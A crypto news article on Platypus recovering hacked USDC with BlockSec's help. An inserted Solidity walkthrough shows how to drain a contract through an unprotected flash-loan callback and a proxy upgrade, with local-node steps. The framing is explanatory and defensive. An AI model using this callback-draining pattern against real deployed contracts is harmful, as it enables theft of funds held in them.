Platypus salvages $2.4 million in hacked funds with BlockSec's help

Quick Take

  • The hacker who exploited Platypus only made off with a small portion of the initially stolen funds.
  • Blockchain security firm BlockSec found a loophole in the attacker’s contract and recovered $2.4 million to Platypus’ address by upgrading the protocol’s proxy to a new implementation.

After the Platypus protocol was hacked yesterday, at least $2.4 million in USDC stablecoin was returned to the exploited platform with help from blockchain security firm BlockSec.

Of the roughly $9.1 million stolen from Platypus, the attacker was able to cash out only about $270,000, according to MetaSleuth, a visualization tool from BlockSec.

Some $8.5 million of the stolen funds remain frozen in the contract they were transferred to, and another $380,000 from a second attempted exploit was accidentally sent back to Aave, on-chain data show.

Retrieving a portion of the stolen funds for Platypus revolved around BlockSec’s plan to take advantage of a loophole in the attacker’s contract.

“By leveraging this loophole, the project can transfer the funds from the attacker contract to the project's account,” Yajin Zhou, co-founder of BlockSec, told The Block.

“The project recovered $2 million using the proof of concept provided by us. This was to recover the funds in the attacker's contract,” according to Zhou, who added that some $8 million in assets were stranded since the attacker contract lacks a transfer function.


Callback the hack

To get the crypto back, BlockSec relied on a callback function in the attacker’s contract that, lacking any access control, anyone could invoke.

“The attack was launched through the flash loan callback interface in the attack contract. This callback function has no access control. And during this callback function, the attacker hardcoded the logic to approve USDC to the project’s contract (which is a proxy),” Zhou noted.

“So the project can first invoke the callback function in the attacker contract to approve USDC to the project’s contract. Then the project contract can withdraw the USDC from the attacker contract by upgrading the proxy to a new implementation," said Zhou.
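The two-step recovery Zhou describes, as an added Solidity illustration written for this page (it is not BlockSec's proof of concept or Platypus' code): a flash-loan receiver whose callback has no access control and unconditionally approves USDC to the victim's proxy, a minimal admin-upgradeable proxy, and a replacement implementation that first invokes that callback and then pulls the balance with transferFrom. The contract names, the Aave V2-style callback signature, the unlimited approval amount, the mock token and the single-slot storage layout are assumptions for the example, not details reported in the article.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Minimal ERC-20 surface used below.
interface IERC20 {
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function balanceOf(address owner) external view returns (uint256);
}

// Test-only token constructed for this example (anyone may mint; do not deploy for real).
contract MockUSDC is IERC20 {
    mapping(address => uint256) public override balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }
    function approve(address spender, uint256 amount) external override returns (bool) {
        allowance[msg.sender][spender] = amount; return true;
    }
    function transferFrom(address from, address to, uint256 amount) external override returns (bool) {
        require(allowance[from][msg.sender] >= amount && balanceOf[from] >= amount, "insufficient");
        allowance[from][msg.sender] -= amount; balanceOf[from] -= amount; balanceOf[to] += amount;
        return true;
    }
}

// Attacker side: the loophole. A flash-loan receiver callback must be callable by the lender,
// but this one checks neither msg.sender nor `initiator`, so anyone can call it, and the first
// thing it does is the hard-coded approval the article describes.
// Signature modelled on Aave V2's receiver interface (assumption); names are illustrative.
contract LeakyAttackerContract {
    IERC20 public immutable usdc;
    address public immutable platypusProxy; // victim protocol, which sits behind a proxy

    constructor(IERC20 _usdc, address _proxy) { usdc = _usdc; platypusProxy = _proxy; }

    function executeOperation(
        address[] calldata, uint256[] calldata, uint256[] calldata, address, bytes calldata
    ) external returns (bool) {
        // Fix the attacker forgot: require(msg.sender == POOL && initiator == address(this));
        usdc.approve(platypusProxy, type(uint256).max); // unconditional, hard-coded approval
        // ... the exploit steps would follow here; omitted ...
        return true;
    }
    // No withdraw/transfer function exists, so any token that is never approved to anyone is
    // stranded here for good: the "lacks a transfer function" case in the article.
}

// Protocol side: a minimal admin-upgradeable proxy using the EIP-1967 implementation slot.
contract UpgradeableProxy {
    address public admin; // slot 0; the implementation below mirrors this layout on purpose
    bytes32 private constant IMPL_SLOT =
        0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    constructor(address impl) { admin = msg.sender; _setImpl(impl); }

    function upgradeTo(address impl) external { require(msg.sender == admin, "not admin"); _setImpl(impl); }

    function _setImpl(address impl) private { bytes32 s = IMPL_SLOT; assembly { sstore(s, impl) } }

    fallback() external payable {
        bytes32 s = IMPL_SLOT;
        assembly {
            let impl := sload(s)
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) }
        }
    }
}

// Implementation the admin upgrades to. It runs via delegatecall, so the attacker contract sees
// the proxy as msg.sender, and the proxy is exactly the address the hard-coded approve() grants.
contract RescueImplementation {
    address public admin; // same slot 0 as the proxy, so this reads the proxy's admin

    function rescue(IERC20 token, address attacker, address to) external returns (uint256 moved) {
        require(msg.sender == admin, "not admin"); // otherwise anyone could redirect the recovery
        // Step 1: invoke the unprotected callback; its approve() now grants the proxy an allowance.
        address[] memory a; uint256[] memory b; uint256[] memory c;
        LeakyAttackerContract(attacker).executeOperation(a, b, c, address(this), "");
        // Step 2: the proxy is an approved spender, so pull the attacker contract's whole balance.
        moved = token.balanceOf(attacker);
        require(token.transferFrom(attacker, to, moved), "transferFrom failed");
    }
}
```

To reproduce on a local node: deploy MockUSDC, deploy UpgradeableProxy (any implementation address will do initially), deploy LeakyAttackerContract pointing at the proxy, mint to the attacker contract, then as admin call upgradeTo with a fresh RescueImplementation and call rescue through the proxy address. Two caveats a practitioner would check before doing this for real: the rescue implementation must preserve the live implementation's storage layout (here there is only the admin slot, by assumption), and the rescue entry point must itself be access-controlled, since an unprotected one would simply hand the recovered funds to the next caller. The attacker-side lesson applies to every flash-loan receiver: verify msg.sender is the lending pool and initiator is address(this), or the callback is a public function that does whatever it hard-codes for whoever calls it.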

Correction: Updated to correct Platypus' formal name. 


© 2023 The Block. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.

About Authors

Jeremy Nation is a senior reporter at The Block covering the greater blockchain ecosystem. Prior to joining The Block, Jeremy worked as a product content specialist at Bullish and Block.one. He also served as a reporter for ETHNews. Follow him on Twitter @ETH_Nation.
Vishal Chawla is The Block’s crypto ecosystems editor and has spent over six years covering tech protocols, cybersecurity, artificial intelligence and cloud computing. Vishal likes to delve deep into blockchain intricacies to ensure readers are well-informed about the continuously evolving crypto landscape. He is also a staunch advocate for rigorous security practices in the space. Before joining The Block, Vishal held positions at IDG ComputerWorld, CIO, and Crypto Briefing. He can be reached on Twitter at @vishal4c.
